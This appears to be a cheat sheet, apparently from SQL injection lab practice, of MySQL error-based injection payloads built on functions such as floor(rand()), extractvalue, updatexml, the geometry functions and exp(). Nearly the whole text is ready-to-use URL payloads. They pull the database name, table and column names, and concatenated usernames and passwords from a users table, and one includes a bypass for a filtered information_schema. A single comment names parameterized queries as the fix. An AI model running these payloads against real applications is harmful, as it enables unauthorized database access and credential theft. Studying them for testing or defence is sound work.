#1.floor()
#报错信息中数据库名尾部会多一个1:这是floor(rand(0)*2)的结果,被concat()拼接在database()之后,不属于库名
#?id=1'and (select count(*) from information_schema.tables group by concat(database(),floor(rand(0)*2)))--+
#?id=1' union select 1,2,count(*) from information_schema.tables group by concat(database(),floor(rand(0)*2)) --+
#?id=1'and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
#information_schema被过滤时(下面的写法不引用information_schema;关键字黑名单挡不住报错注入,修复应使用参数化查询)
#?id=1'and (select count(*) from (select 1 union select null union select !1)a group by concat(database(), floor(rand(0)*2)))--+
# 2.extractvalue()
#?id=1' and (select * from dat where id=1 and extractvalue(1,concat(0x7e,(select database()))))--+
# 3.updatexml()
#?id=1' and 1=(updatexml(1,concat(0x7e,(select database()),0x7e),1))--+
#?id=1' and updatexml(1,concat(0x7e,(select database())),1)--+
#?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 0,1)),1)--+
#?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1)),1)--+
#?id=1' and updatexml(1,concat(0x7e,(select concat(password,username) from security.users limit 0,1)),1)--+
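# 4.geometrycollection()  # fail: the server returns an "Illegal non geometric ..." error instead of the subquery result (presumably the tested MySQL version validates the argument type; confirm the version)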
# geometrycollection((select * from(select * from(select database())a)b))
# 5.multipoint()
# ?id=1'and (select * from test where id=1 and multipoint((select * from(select * from(select user())a)b)))--+
# 6.polygon()
# select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
# 7.multipolygon()
# select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
# 8.linestring()
# select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
# 9.multilinestring()
# select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
# 10.exp()
# select * from test where id=1 and exp(~(select * from(select user())a));
SQL报错注入函数(MySQL)